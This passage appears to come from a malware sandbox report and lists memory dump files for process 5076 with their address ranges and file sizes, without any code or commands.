      • memory/5076-37-0x0000000007870000-0x0000000007EEA000-memory.dmp

        Filesize

        6.5MB

      • memory/5076-36-0x0000000006060000-0x00000000060AC000-memory.dmp

        Filesize

        304KB

      • memory/5076-35-0x0000000006020000-0x000000000603E000-memory.dmp

        Filesize

        120KB

      • memory/5076-33-0x0000000005A20000-0x0000000005D74000-memory.dmp

        Filesize

        3.3MB

      • memory/5076-23-0x0000000005930000-0x0000000005996000-memory.dmp

        Filesize

        408KB

      • memory/5076-22-0x0000000005850000-0x00000000058B6000-memory.dmp

        Filesize

        408KB

      • memory/5076-20-0x0000000005150000-0x0000000005778000-memory.dmp

        Filesize

        6.2MB

      • memory/5076-19-0x0000000004AC0000-0x0000000004AF6000-memory.dmp

        Filesize

        216KB